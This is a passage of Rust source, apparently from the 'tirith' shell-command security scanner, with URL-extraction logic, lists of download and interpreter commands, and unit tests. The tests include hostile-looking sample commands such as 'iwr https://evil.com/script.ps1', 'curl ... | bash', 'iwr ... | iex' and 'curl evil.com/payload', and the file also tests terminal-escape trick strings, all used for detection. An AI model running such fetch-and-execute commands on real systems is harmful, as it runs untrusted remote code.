999pub fn tirith_inert_arg_range(input: &str, shell: ShellType) -> Option<std::ops::Range<usize>> {
1000    let segments = tokenize::tokenize(input, shell);
1001    let first = segments.first()?;
1002
1003    // Resolve the segment's command through wrappers — must end at "tirith".
1004    let resolved = resolve_segment_command(first)?;
1005    if resolved.name != "tirith" {
1006        return None;
1007    }
1008
1009    // Find the first non-flag arg (the subcommand). Start from args[0] because
1010    // resolve_tirith_command already strips wrapper prefixes.
1011    let mut sub_idx = 0;
1012    while sub_idx < resolved.args.len() {
1013        let clean = strip_quotes(&resolved.args[sub_idx]);
1014        if clean.starts_with('-') {
1015            sub_idx += 1;
1016            continue;
1017        }
1018        break;
1019    }
1020    let sub_arg = resolved.args.get(sub_idx)?;
1021    let subcommand = command_base_name(sub_arg);
1022    if !is_tirith_inspection_subcommand(&subcommand) {
1023        return None;
1024    }
1025
1026    // The inert range is everything after the subcommand word within this
1027    // segment. Locate the subcommand token inside the segment's byte range
1028    // by scanning for a whitespace-delimited match, not a raw substring find.
1029    // Otherwise `tirith --config=diff diff URL` would match the `diff` inside
1030    // `--config=diff` and the inert range would start too early.
1031    let seg_slice = input.get(first.byte_range.clone())?;
1032    let sub_rel = find_subcommand_token(seg_slice, sub_arg.as_str())?;
1033    let inert_start = first.byte_range.start + sub_rel + sub_arg.len();
1034    let inert_end = first.byte_range.end;
1035    if inert_start >= inert_end {
1036        return None;
1037    }
1038    Some(inert_start..inert_end)
1039}
1040
1041/// Find the byte offset within `haystack` where the subcommand token `needle`
1042/// begins — only matching when preceded by start-of-string or whitespace.
1043/// Prevents `--config=diff` from matching `diff` in `tirith --config=diff diff URL`.
1044fn find_subcommand_token(haystack: &str, needle: &str) -> Option<usize> {
1045    let bytes = haystack.as_bytes();
1046    let n = needle.len();
1047    let mut search_from = 0;
1048    while let Some(rel) = haystack.get(search_from..)?.find(needle) {
1049        let abs = search_from + rel;
1050        let preceded_by_ws_or_start =
1051            abs == 0 || matches!(bytes.get(abs - 1), Some(b) if b.is_ascii_whitespace());
1052        // Also require that the match end is a word boundary (whitespace or EOS),
1053        // so `differ` doesn't match `diff`.
1054        let followed_by_ws_or_end = abs + n == bytes.len()
1055            || matches!(bytes.get(abs + n), Some(b) if b.is_ascii_whitespace());
1056        if preceded_by_ws_or_start && followed_by_ws_or_end {
1057            return Some(abs);
1058        }
1059        search_from = abs + 1;
1060    }
1061    None
1062}
1063
1064/// Check if a segment is in a "sink" context (executing/downloading).
1065fn is_sink_context(segment: &Segment, _all_segments: &[Segment]) -> bool {
1066    if let Some(cmd) = resolve_segment_command(segment) {
1067        let cmd_lower = cmd.name;
1068        // git is only a sink for download subcommands (clone, fetch, pull, etc.)
1069        if cmd_lower == "git" {
1070            return is_git_sink(cmd.args);
1071        }
1072        if is_source_command(&cmd_lower) {
1073            return true;
1074        }
1075    }
1076
1077    // Check if this segment pipes into a sink
1078    if let Some(sep) = &segment.preceding_separator {
1079        if sep == "|" || sep == "|&" {
1080            // This segment receives piped input — check if it's an interpreter
1081            if let Some(cmd) = resolve_segment_command(segment) {
1082                if is_interpreter(&cmd.name) {
1083                    return true;
1084                }
1085            }
1086        }
1087    }
1088
1089    false
1090}
1091
1092fn is_source_command(cmd: &str) -> bool {
1093    matches!(
1094        cmd,
1095        "curl"
1096            | "wget"
1097            | "http"
1098            | "https"
1099            | "xh"
1100            | "fetch"
1101            | "scp"
1102            | "rsync"
1103            | "docker"
1104            | "podman"
1105            | "nerdctl"
1106            | "pip"
1107            | "pip3"
1108            | "npm"
1109            | "npx"
1110            | "yarn"
1111            | "pnpm"
1112            | "go"
1113            | "cargo"
1114            | "iwr"
1115            | "irm"
1116            | "invoke-webrequest"
1117            | "invoke-restmethod"
1118            | "tirith-run"
1119    )
1120}
1121
1122/// Parsed scp/rsync remote spec of shape `[user@]host:path`. Not currently
1123/// consumed beyond the parser existence check (which validates the shape),
1124/// but this is what downstream policy consumers (e.g. network_deny for remote
1125/// scp targets) will want — writing an actual parser instead of a substring
1126/// check makes the drive-letter guard verifiable and the logic auditable.
1127///
1128/// Shell-aware: the Windows drive-letter guard is narrow on Posix/Fish
1129/// (single-letter SSH aliases like `scp file x:/tmp/` are legitimate there),
1130/// wider on PowerShell/Cmd so drive letters do not masquerade as remote specs.
1131/// Parsed scp/rsync remote spec of shape `[user@]host:path`. Returned by
1132/// [`parse_scp_remote_spec`] so callers (e.g. `network_deny` enforcement) can
1133/// route on the host without re-parsing. `path` is kept as the literal
1134/// remainder after the first `:`, no normalization.
1135pub struct ScpRemoteSpec {
1136    pub user: Option<String>,
1137    pub host: String,
1138    pub path: String,
1139}
1140
1141/// Parse `[user@]host:path` from an scp/rsync argument.
1142///
1143/// Accepts `host:path` and `user@host:path`. Rejects:
1144/// - tokens without `:` → plain local path
1145/// - tokens starting with `-` → flag
1146/// - tokens containing `://` → URL scheme
1147/// - `:` preceded by `/` → absolute local path that happens to contain `:`
1148/// - empty host part, or host containing `/`
1149/// - Windows drive-letter shapes (see below)
1150///
1151/// Windows drive-letter guard — deliberately narrow so it doesn't break
1152/// legitimate one-letter SSH aliases (e.g. `scp file x:/tmp/`):
1153/// - `X:\...` — reject ALWAYS; backslash after a drive letter is never scp.
1154/// - `X:/...` — reject ONLY on PowerShell/Cmd; POSIX treats this as an alias.
1155/// - `X:foo`  — ACCEPT everywhere; ambiguous with scp's `x:relative-path`,
1156///   and preserving back-compat here beats over-rejection.
1157pub fn parse_scp_remote_spec(arg: &str, shell: ShellType) -> Option<ScpRemoteSpec> {
1158    if arg.is_empty() || arg.starts_with('-') || arg.contains("://") {
1159        return None;
1160    }
1161
1162    // Two accepted shapes:
1163    //   1. `user@host[:path]` — the colon is optional. Strict scp requires it,
1164    //      but we also accept bare `user@host` to suppress a false positive
1165    //      where `looks_like_schemeless_host` would otherwise flag it.
1166    //   2. `host:path` — no `@`, colon required.
1167    if let Some(at_pos) = arg.find('@') {
1168        let before_at = &arg[..at_pos];
1169        let after_at = &arg[at_pos + 1..];
1170        if before_at.is_empty() || after_at.is_empty() || before_at.contains(':') {
1171            return None;
1172        }
1173        let (host, path) = match after_at.find(':') {
1174            Some(colon_pos) => {
1175                // `:` preceded by `/` in after_at means a colon inside a path, not
1176                // a host:path boundary. Unusual but safe to reject.
1177                if colon_pos > 0 && after_at.as_bytes()[colon_pos - 1] == b'/' {
1178                    return None;
1179                }
1180                (
1181                    &after_at[..colon_pos],
1182                    after_at[colon_pos + 1..].to_string(),
1183                )
1184            }
1185            None => (after_at, String::new()),
1186        };
1187        if !is_valid_scp_host(host) {
1188            return None;
1189        }
1190        return Some(ScpRemoteSpec {
1191            user: Some(before_at.to_string()),
1192            host: host.to_string(),
1193            path,
1194        });
1195    }
1196
1197    // No `@` — must have `host:path` with an explicit colon.
1198    let colon_pos = arg.find(':')?;
1199    if colon_pos > 0 && arg.as_bytes()[colon_pos - 1] == b'/' {
1200        return None;
1201    }
1202    let host = &arg[..colon_pos];
1203    let after_colon = &arg[colon_pos + 1..];
1204    if !is_valid_scp_host(host) {
1205        return None;
1206    }
1207
1208    // Windows drive-letter guard — only applies when host is a single ASCII
1209    // letter AND `user@` is absent (see module doc above for shape breakdown).
1210    if host.len() == 1 && host.chars().next().unwrap().is_ascii_alphabetic() {
1211        let first_after = after_colon.chars().next();
1212        match first_after {
1213            Some('\\') => return None,
1214            Some('/') if matches!(shell, ShellType::PowerShell | ShellType::Cmd) => {
1215                return None;
1216            }
1217            _ => {}
1218        }
1219    }
1220
1221    Some(ScpRemoteSpec {
1222        user: None,
1223        host: host.to_string(),
1224        path: after_colon.to_string(),
1225    })
1226}
1227
1228fn is_valid_scp_host(host: &str) -> bool {
1229    !host.is_empty()
1230        && !host.contains('/')
1231        && !host.contains(':')
1232        && host
1233            .chars()
1234            .all(|c| c.is_ascii_alphanumeric() || matches!(c, '.' | '_' | '-'))
1235}
1236
1237/// Check if a git command is in a sink context (only subcommands that download).
1238/// `git add`, `git commit`, `git status`, etc. are NOT sinks.
1239fn is_git_sink(args: &[String]) -> bool {
1240    if args.is_empty() {
1241        return false;
1242    }
1243    // First non-flag arg is the subcommand
1244    for arg in args {
1245        let clean = strip_quotes(arg);
1246        if clean.starts_with('-') {
1247            continue;
1248        }
1249        return matches!(
1250            clean.as_str(),
1251            "clone" | "fetch" | "pull" | "submodule" | "remote"
1252        );
1253    }
1254    false
1255}
1256
1257fn is_interpreter(cmd: &str) -> bool {
1258    matches!(
1259        cmd,
1260        "sh" | "bash"
1261            | "zsh"
1262            | "dash"
1263            | "ksh"
1264            | "python"
1265            | "python3"
1266            | "node"
1267            | "perl"
1268            | "ruby"
1269            | "php"
1270            | "iex"
1271            | "invoke-expression"
1272    )
1273}
1274
1275/// Check if an arg at the given index is the value of an output-file or credential flag
1276/// for the given command. Returns true if this arg should be skipped during schemeless
1277/// URL detection (output filenames and auth credentials can look like domains).
1278fn is_output_flag_value(cmd: &str, args: &[String], arg_index: usize) -> bool {
1279    let cmd_lower = cmd.to_lowercase();
1280    let cmd_base = cmd_lower.rsplit('/').next().unwrap_or(&cmd_lower);
1281
1282    match cmd_base {
1283        "curl" => {
1284            if arg_index > 0 {
1285                let prev = strip_quotes(&args[arg_index - 1]);
1286                if prev == "-o"
1287                    || prev == "--output"
1288                    || prev == "-u"
1289                    || prev == "--user"
1290                    || prev == "-U"
1291                    || prev == "--proxy-user"
1292                {
1293                    return true;
1294                }
1295            }
1296            let current = strip_quotes(&args[arg_index]);
1297            if current.starts_with("-o") && current.len() > 2 && !current.starts_with("--") {
1298                return true;
1299            }
1300            if current.starts_with("--output=")
1301                || current.starts_with("--user=")
1302                || current.starts_with("--proxy-user=")
1303            {
1304                return true;
1305            }
1306            false
1307        }
1308        "wget" => {
1309            if arg_index > 0 {
1310                let prev = strip_quotes(&args[arg_index - 1]);
1311                if prev == "-O"
1312                    || prev == "--output-document"
1313                    || prev == "--user"
1314                    || prev == "--password"
1315                    || prev == "--http-user"
1316                    || prev == "--http-password"
1317                    || prev == "--ftp-user"
1318                    || prev == "--ftp-password"
1319                    || prev == "--proxy-user"
1320                    || prev == "--proxy-password"
1321                {
1322                    return true;
1323                }
1324            }
1325            let current = strip_quotes(&args[arg_index]);
1326            if current.starts_with("-O") && current.len() > 2 && !current.starts_with("--") {
1327                return true;
1328            }
1329            if current.starts_with("--output-document=")
1330                || current.starts_with("--user=")
1331                || current.starts_with("--password=")
1332                || current.starts_with("--http-user=")
1333                || current.starts_with("--http-password=")
1334                || current.starts_with("--ftp-user=")
1335                || current.starts_with("--ftp-password=")
1336                || current.starts_with("--proxy-user=")
1337                || current.starts_with("--proxy-password=")
1338            {
1339                return true;
1340            }
1341            false
1342        }
1343        "http" | "https" | "xh" => {
1344            if arg_index > 0 {
1345                let prev = strip_quotes(&args[arg_index - 1]);
1346                if prev == "-a" || prev == "--auth" {
1347                    return true;
1348                }
1349            }
1350            let current = strip_quotes(&args[arg_index]);
1351            if current.starts_with("--auth=") {
1352                return true;
1353            }
1354            false
1355        }
1356        _ => false,
1357    }
1358}
1359
1360fn strip_quotes(s: &str) -> String {
1361    let s = s.trim();
1362    if s.len() >= 2
1363        && ((s.starts_with('"') && s.ends_with('"')) || (s.starts_with('\'') && s.ends_with('\'')))
1364    {
1365        s[1..s.len() - 1].to_string()
1366    } else {
1367        s.to_string()
1368    }
1369}
1370
1371fn looks_like_schemeless_host(s: &str) -> bool {
1372    // Must contain a dot, not start with -, not be a flag
1373    if s.starts_with('-') || !s.contains('.') {
1374        return false;
1375    }
1376    // Dotfiles and hidden files (e.g., .gitignore, .env.example) are not URLs
1377    if s.starts_with('.') {
1378        return false;
1379    }
1380    // First component before / or end should look like a domain
1381    let host_part = s.split('/').next().unwrap_or(s);
1382    if !host_part.contains('.') || host_part.contains(' ') {
1383        return false;
1384    }
1385    // Exclude args where the host part looks like a file (e.g., "install.sh")
1386    // BUT only when there is no meaningful path component — if there IS a non-empty
1387    // path (e.g., evil.zip/payload), the host part is likely a real domain even if its
1388    // TLD overlaps a file extension. A trailing slash alone (file.sh/) does NOT count
1389    // as a meaningful path — it's still a filename, not a domain.
1390    let host_lower = host_part.to_lowercase();
1391    let has_meaningful_path = s.find('/').is_some_and(|idx| {
1392        let after_slash = &s[idx + 1..];
1393        !after_slash.is_empty() && after_slash != "/"
1394    });
1395    if !has_meaningful_path {
1396        let file_exts = [
1397            ".sh",
1398            ".py",
1399            ".rb",
1400            ".js",
1401            ".ts",
1402            ".go",
1403            ".rs",
1404            ".c",
1405            ".h",
1406            ".txt",
1407            ".md",
1408            ".json",
1409            ".yaml",
1410            ".yml",
1411            ".xml",
1412            ".html",
1413            ".css",
1414            ".tar.gz",
1415            ".tar.bz2",
1416            ".tar.xz",
1417            ".tgz",
1418            ".zip",
1419            ".gz",
1420            ".bz2",
1421            ".rpm",
1422            ".deb",
1423            ".pkg",
1424            ".dmg",
1425            ".exe",
1426            ".msi",
1427            ".dll",
1428            ".so",
1429            ".log",
1430            ".conf",
1431            ".cfg",
1432            ".ini",
1433            ".toml",
1434            ".png",
1435            ".jpg",
1436            ".jpeg",
1437            ".gif",
1438            ".bmp",
1439            ".ico",
1440            ".tiff",
1441            ".tif",
1442            ".pdf",
1443            ".csv",
1444            ".mp3",
1445            ".mp4",
1446            ".wav",
1447            ".avi",
1448            ".mkv",
1449            ".flac",
1450            ".ogg",
1451            ".webm",
1452            ".ttf",
1453            ".otf",
1454            ".woff",
1455            ".woff2",
1456            ".docx",
1457            ".xlsx",
1458            ".pptx",
1459            ".sqlite",
1460            ".lock",
1461            ".example",
1462            ".local",
1463            ".bak",
1464            ".tmp",
1465            ".swp",
1466            ".orig",
1467            ".patch",
1468            ".diff",
1469            ".map",
1470            ".env",
1471            ".sample",
1472            ".dist",
1473            ".editorconfig",
1474        ];
1475        if file_exts.iter().any(|ext| host_lower.ends_with(ext)) {
1476            return false;
1477        }
1478    }
1479    // Must have at least 2 labels (e.g., "example.com" not just "file.txt")
1480    let labels: Vec<&str> = host_part.split('.').collect();
1481    if labels.len() < 2 {
1482        return false;
1483    }
1484    // Last label (TLD) should be 2-63 alphabetic chars (DNS label max)
1485    let tld = labels.last().unwrap();
1486    tld.len() >= 2 && tld.len() <= 63 && tld.chars().all(|c| c.is_ascii_alphabetic())
1487}
1488
1489fn extract_host_from_schemeless(s: &str) -> String {
1490    s.split('/').next().unwrap_or(s).to_string()
1491}
1492
1493fn extract_path_from_schemeless(s: &str) -> String {
1494    if let Some(idx) = s.find('/') {
1495        s[idx..].to_string()
1496    } else {
1497        String::new()
1498    }
1499}
1500
1501#[cfg(test)]
1502mod tests {
1503    use super::*;
1504
1505    #[test]
1506    fn test_tier1_exec_matches_url() {
1507        assert!(tier1_scan("curl https://example.com", ScanContext::Exec));
1508    }
1509
1510    #[test]
1511    fn test_tier1_exec_no_match_simple() {
1512        assert!(!tier1_scan("ls -la", ScanContext::Exec));
1513    }
1514
1515    #[test]
1516    fn test_tier1_exec_no_match_echo() {
1517        assert!(!tier1_scan("echo hello world", ScanContext::Exec));
1518    }
1519
1520    #[test]
1521    fn test_tier1_exec_matches_pipe_bash() {
1522        assert!(tier1_scan("something | bash", ScanContext::Exec));
1523    }
1524
1525    #[test]
1526    fn test_tier1_exec_matches_pipe_sudo_bash() {
1527        assert!(tier1_scan("something | sudo bash", ScanContext::Exec));
1528    }
1529
1530    #[test]
1531    fn test_tier1_exec_matches_pipe_env_bash() {
1532        assert!(tier1_scan("something | env bash", ScanContext::Exec));
1533    }
1534
1535    #[test]
1536    fn test_tier1_exec_matches_pipe_bin_bash() {
1537        assert!(tier1_scan("something | /bin/bash", ScanContext::Exec));
1538    }
1539
1540    #[test]
1541    fn test_tier1_exec_matches_git_scp() {
1542        assert!(tier1_scan(
1543            "git clone git@github.com:user/repo",
1544            ScanContext::Exec
1545        ));
1546    }
1547
1548    #[test]
1549    fn test_tier1_exec_matches_punycode() {
1550        assert!(tier1_scan(
1551            "curl https://xn--example-cua.com",
1552            ScanContext::Exec
1553        ));
1554    }
1555
1556    #[test]
1557    fn test_tier1_exec_matches_docker() {
1558        assert!(tier1_scan("docker pull malicious/image", ScanContext::Exec));
1559    }
1560
1561    #[test]
1562    fn test_tier1_exec_matches_iwr() {
1563        assert!(tier1_scan(
1564            "iwr https://evil.com/script.ps1",
1565            ScanContext::Exec
1566        ));
1567    }
1568
1569    #[test]
1570    fn test_tier1_exec_matches_curl() {
1571        assert!(tier1_scan(
1572            "curl https://example.com/install.sh",
1573            ScanContext::Exec
1574        ));
1575    }
1576
1577    #[test]
1578    fn test_tier1_exec_matches_lookalike_tld() {
1579        assert!(tier1_scan("open file.zip", ScanContext::Exec));
1580    }
1581
1582    #[test]
1583    fn test_tier1_exec_matches_shortener() {
1584        assert!(tier1_scan("curl bit.ly/abc", ScanContext::Exec));
1585    }
1586
1587    #[test]
1588    fn test_tier1_paste_matches_non_ascii() {
1589        assert!(tier1_scan("café", ScanContext::Paste));
1590    }
1591
1592    #[test]
1593    fn test_tier1_paste_exec_patterns_also_match() {
1594        assert!(tier1_scan("curl https://example.com", ScanContext::Paste));
1595    }
1596
1597    #[test]
1598    fn test_tier1_exec_no_non_ascii() {
1599        // Non-ASCII should NOT trigger exec-time scan
1600        assert!(!tier1_scan("echo café", ScanContext::Exec));
1601    }
1602
1603    #[test]
1604    fn test_byte_scan_ansi() {
1605        let input = b"hello \x1b[31mred\x1b[0m world";
1606        let result = scan_bytes(input);
1607        assert!(result.has_ansi_escapes);
1608    }
1609
1610    #[test]
1611    fn test_byte_scan_control_chars() {
1612        let input = b"hello\rworld";
1613        let result = scan_bytes(input);
1614        assert!(result.has_control_chars);
1615    }
1616
1617    #[test]
1618    fn test_byte_scan_bidi() {
1619        let input = "hello\u{202E}dlrow".as_bytes();
1620        let result = scan_bytes(input);
1621        assert!(result.has_bidi_controls);
1622    }
1623
1624    #[test]
1625    fn test_byte_scan_zero_width() {
1626        let input = "hel\u{200B}lo".as_bytes();
1627        let result = scan_bytes(input);
1628        assert!(result.has_zero_width);
1629    }
1630
1631    #[test]
1632    fn test_byte_scan_clean() {
1633        let input = b"hello world\n";
1634        let result = scan_bytes(input);
1635        assert!(!result.has_ansi_escapes);
1636        assert!(!result.has_control_chars);
1637        assert!(!result.has_bidi_controls);
1638        assert!(!result.has_zero_width);
1639    }
1640
1641    #[test]
1642    fn test_extract_urls_basic() {
1643        let urls = extract_urls("curl https://example.com/install.sh", ShellType::Posix);
1644        assert_eq!(urls.len(), 1);
1645        assert_eq!(urls[0].raw, "https://example.com/install.sh");
1646    }
1647
1648    #[test]
1649    fn test_extract_urls_from_leading_env_assignment() {
1650        let urls = extract_urls(
1651            "PAYLOAD_URL=https://example.com/install.sh curl ok",
1652            ShellType::Posix,
1653        );
1654        assert!(
1655            urls.iter()
1656                .any(|u| u.raw == "https://example.com/install.sh" && u.in_sink_context),
1657            "leading env assignment URL should be extracted in sink context"
1658        );
1659    }
1660
1661    #[test]
1662    fn test_extract_urls_from_quoted_leading_env_assignment() {
1663        let urls = extract_urls(
1664            "PAYLOAD_URL='https://example.com/install.sh' curl ok",
1665            ShellType::Posix,
1666        );
1667        assert!(
1668            urls.iter()
1669                .any(|u| u.raw == "https://example.com/install.sh"),
1670            "quoted leading env assignment URL should be extracted"
1671        );
1672    }
1673
1674    #[test]
1675    fn test_proxy_env_assignment_url_is_not_treated_as_destination() {
1676        let urls = extract_urls(
1677            "HTTP_PROXY=http://proxy:8080 curl https://example.com/data",
1678            ShellType::Posix,
1679        );
1680        assert!(
1681            !urls.iter().any(|u| u.raw == "http://proxy:8080"),
1682            "proxy configuration URLs should not be treated as destinations"
1683        );
1684    }
1685
1686    #[test]
1687    fn test_extract_urls_pipe() {
1688        let urls = extract_urls(
1689            "curl https://example.com/install.sh | bash",
1690            ShellType::Posix,
1691        );
1692        assert!(!urls.is_empty());
1693        assert!(urls[0].in_sink_context);
1694    }
1695
1696    #[test]
1697    fn test_extract_urls_scp() {
1698        let urls = extract_urls("git clone git@github.com:user/repo.git", ShellType::Posix);
1699        assert!(!urls.is_empty());
1700        assert!(matches!(urls[0].parsed, UrlLike::Scp { .. }));
1701    }
1702
1703    #[test]
1704    fn test_extract_docker_ref() {
1705        let urls = extract_urls("docker pull nginx", ShellType::Posix);
1706        let docker_urls: Vec<_> = urls
1707            .iter()
1708            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1709            .collect();
1710        assert_eq!(docker_urls.len(), 1);
1711    }
1712
1713    #[test]
1714    fn test_extract_powershell_iwr() {
1715        let urls = extract_urls(
1716            "iwr https://example.com/script.ps1 | iex",
1717            ShellType::PowerShell,
1718        );
1719        assert!(!urls.is_empty());
1720    }
1721
1722    #[test]
1723    fn test_wrapper_preserves_sink_context() {
1724        let urls = extract_urls(
1725            "env --ignore-environment curl http://example.com",
1726            ShellType::Posix,
1727        );
1728        assert!(
1729            urls.iter()
1730                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1731            "wrapped sink commands should keep sink context"
1732        );
1733    }
1734
1735    #[test]
1736    fn test_env_wrapper_preserves_tirith_run_sink_context() {
1737        let urls = extract_urls("env tirith run http://example.com", ShellType::Posix);
1738        assert!(
1739            urls.iter()
1740                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1741            "env wrapper should preserve tirith run sink context"
1742        );
1743    }
1744
1745    #[test]
1746    fn test_command_wrapper_preserves_tirith_run_sink_context() {
1747        let urls = extract_urls("command tirith run http://example.com", ShellType::Posix);
1748        assert!(
1749            urls.iter()
1750                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1751            "command wrapper should preserve tirith run sink context"
1752        );
1753    }
1754
1755    #[test]
1756    fn test_time_wrapper_preserves_tirith_run_sink_context() {
1757        let urls = extract_urls("time tirith run http://example.com", ShellType::Posix);
1758        assert!(
1759            urls.iter()
1760                .any(|u| u.raw == "http://example.com" && u.in_sink_context),
1761            "time wrapper should preserve tirith run sink context"
1762        );
1763    }
1764
1765    #[test]
1766    fn test_strip_quotes_single_char() {
1767        assert_eq!(strip_quotes("\""), "\"");
1768        assert_eq!(strip_quotes("'"), "'");
1769    }
1770
1771    #[test]
1772    fn test_strip_quotes_empty() {
1773        assert_eq!(strip_quotes(""), "");
1774    }
1775
1776    #[test]
1777    fn test_scan_bytes_bel_vt_del() {
1778        // BEL (0x07)
1779        let input = b"hello\x07world";
1780        let result = scan_bytes(input);
1781        assert!(result.has_control_chars);
1782
1783        // VT (0x0B)
1784        let input = b"hello\x0Bworld";
1785        let result = scan_bytes(input);
1786        assert!(result.has_control_chars);
1787
1788        // FF (0x0C)
1789        let input = b"hello\x0Cworld";
1790        let result = scan_bytes(input);
1791        assert!(result.has_control_chars);
1792
1793        // DEL (0x7F)
1794        let input = b"hello\x7Fworld";
1795        let result = scan_bytes(input);
1796        assert!(result.has_control_chars);
1797    }
1798
1799    #[test]
1800    fn test_scan_bytes_osc_apc_dcs() {
1801        // OSC: \e]
1802        let input = b"hello\x1b]0;title\x07world";
1803        let result = scan_bytes(input);
1804        assert!(result.has_ansi_escapes);
1805
1806        // APC: \e_
1807        let input = b"hello\x1b_dataworld";
1808        let result = scan_bytes(input);
1809        assert!(result.has_ansi_escapes);
1810
1811        // DCS: \eP
1812        let input = b"hello\x1bPdataworld";
1813        let result = scan_bytes(input);
1814        assert!(result.has_ansi_escapes);
1815    }
1816
1817    #[test]
1818    fn test_schemeless_long_tld() {
1819        assert!(looks_like_schemeless_host("example.academy"));
1820        assert!(looks_like_schemeless_host("example.photography"));
1821    }
1822
1823    #[test]
1824    fn test_segment_index_correct() {
1825        let urls = extract_urls("curl https://a.com | wget https://b.com", ShellType::Posix);
1826        // Each URL should have the segment index of the segment it came from
1827        for url in &urls {
1828            // segment_index should be 0 or 1, not an incrementing counter
1829            assert!(url.segment_index <= 1);
1830        }
1831    }
1832
1833    #[test]
1834    fn test_docker_build_context_not_image() {
1835        let urls = extract_urls("docker build .", ShellType::Posix);
1836        let docker_urls: Vec<_> = urls
1837            .iter()
1838            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1839            .collect();
1840        assert_eq!(
1841            docker_urls.len(),
1842            0,
1843            "build context '.' should not be treated as image"
1844        );
1845    }
1846
1847    #[test]
1848    fn test_docker_image_subcmd() {
1849        let urls = extract_urls("docker image pull nginx", ShellType::Posix);
1850        let docker_urls: Vec<_> = urls
1851            .iter()
1852            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1853            .collect();
1854        assert_eq!(docker_urls.len(), 1);
1855    }
1856
1857    #[test]
1858    fn test_docker_run_image_after_double_dash() {
1859        let urls = extract_urls(
1860            "docker run --rm -- evil.registry/ns/img:1",
1861            ShellType::Posix,
1862        );
1863        let docker_urls: Vec<_> = urls
1864            .iter()
1865            .filter(|u| matches!(u.parsed, UrlLike::DockerRef { .. }))
1866            .collect();
1867        assert_eq!(docker_urls.len(), 1);
1868        assert_eq!(docker_urls[0].raw, "evil.registry/ns/img:1");
1869    }
1870
1871    /// Module-boundary enforcement: guarantees no tier-1 extractor exists
1872    /// outside the declarative pattern table in `build.rs`.
1873    #[test]
1874    fn test_tier1_module_boundary_enforcement() {
1875        let ids = tier1_generated::EXTRACTOR_IDS;
1876        assert!(!ids.is_empty(), "EXTRACTOR_IDS must not be empty");
1877        let exec_count = tier1_generated::TIER1_EXEC_FRAGMENT_COUNT;
1878        let paste_count = tier1_generated::TIER1_PASTE_FRAGMENT_COUNT;
1879        assert!(exec_count > 0, "Must have exec fragments");
1880        assert!(
1881            paste_count >= exec_count,
1882            "Paste fragments must be superset of exec fragments"
1883        );
1884        Regex::new(tier1_generated::TIER1_EXEC_PATTERN)
1885            .expect("Generated exec pattern must be valid regex");
1886        Regex::new(tier1_generated::TIER1_PASTE_PATTERN)
1887            .expect("Generated paste pattern must be valid regex");
1888    }
1889
1890    #[test]
1891    fn test_scan_bytes_trailing_cr_not_flagged() {
1892        let result = scan_bytes(b"/path\r");
1893        assert!(
1894            !result.has_control_chars,
1895            "trailing \\r should not be flagged"
1896        );
1897    }
1898
1899    #[test]
1900    fn test_scan_bytes_trailing_crlf_not_flagged() {
1901        let result = scan_bytes(b"/path\r\n");
1902        assert!(
1903            !result.has_control_chars,
1904            "trailing \\r\\n should not be flagged"
1905        );
1906    }
1907
1908    #[test]
1909    fn test_scan_bytes_windows_multiline_not_flagged() {
1910        let result = scan_bytes(b"line1\r\nline2\r\n");
1911        assert!(
1912            !result.has_control_chars,
1913            "Windows \\r\\n line endings should not be flagged"
1914        );
1915    }
1916
1917    #[test]
1918    fn test_scan_bytes_embedded_cr_still_flagged() {
1919        let result = scan_bytes(b"safe\rmalicious");
1920        assert!(
1921            result.has_control_chars,
1922            "embedded \\r before non-\\n should be flagged"
1923        );
1924    }
1925
1926    #[test]
1927    fn test_scan_bytes_mixed_crlf_and_attack_cr() {
1928        let result = scan_bytes(b"line1\r\nfake\roverwrite\r\n");
1929        assert!(
1930            result.has_control_chars,
1931            "attack \\r mixed with \\r\\n should be flagged"
1932        );
1933    }
1934
1935    #[test]
1936    fn test_scan_bytes_only_cr() {
1937        let result = scan_bytes(b"\r");
1938        assert!(
1939            !result.has_control_chars,
1940            "lone trailing \\r should not be flagged"
1941        );
1942    }
1943
1944    #[test]
1945    fn test_schemeless_skip_curl_output_flag() {
1946        // `-o <filename>` is curl's output flag; the filename must not be
1947        // treated as a schemeless URL even though it matches the host shape.
1948        let urls = extract_urls("curl -o lenna.png https://example.com", ShellType::Posix);
1949        let schemeless: Vec<_> = urls
1950            .iter()
1951            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1952            .collect();
1953        assert!(
1954            schemeless.is_empty(),
1955            "lenna.png should not be detected as schemeless URL"
1956        );
1957    }
1958
1959    #[test]
1960    fn test_schemeless_skip_curl_output_combined() {
1961        let urls = extract_urls("curl -olenna.png https://example.com", ShellType::Posix);
1962        let schemeless: Vec<_> = urls
1963            .iter()
1964            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1965            .collect();
1966        assert!(
1967            schemeless.is_empty(),
1968            "-olenna.png should not be detected as schemeless URL"
1969        );
1970    }
1971
1972    #[test]
1973    fn test_schemeless_skip_wget_output_flag() {
1974        let urls = extract_urls("wget -O output.html https://example.com", ShellType::Posix);
1975        let schemeless: Vec<_> = urls
1976            .iter()
1977            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1978            .collect();
1979        assert!(
1980            schemeless.is_empty(),
1981            "output.html should not be detected as schemeless URL"
1982        );
1983    }
1984
1985    #[test]
1986    fn test_schemeless_skip_wget_combined() {
1987        let urls = extract_urls("wget -Ooutput.html https://example.com", ShellType::Posix);
1988        let schemeless: Vec<_> = urls
1989            .iter()
1990            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
1991            .collect();
1992        assert!(
1993            schemeless.is_empty(),
1994            "-Ooutput.html should not be detected as schemeless URL"
1995        );
1996    }
1997
1998    #[test]
1999    fn test_schemeless_real_domain_still_detected() {
2000        let urls = extract_urls("curl evil.com/payload", ShellType::Posix);
2001        let schemeless: Vec<_> = urls
2002            .iter()
2003            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2004            .collect();
2005        assert!(
2006            !schemeless.is_empty(),
2007            "evil.com/payload should be detected as schemeless URL"
2008        );
2009    }
2010
2011    #[test]
2012    fn test_schemeless_user_at_host_detected_in_sink_context() {
2013        let urls = extract_urls("curl user@bit.ly", ShellType::Posix);
2014        let schemeless: Vec<_> = urls
2015            .iter()
2016            .filter(|u| matches!(u.parsed, UrlLike::SchemelessHostPath { .. }))
2017            .collect();
2018        assert_eq!(schemeless.len(), 1);
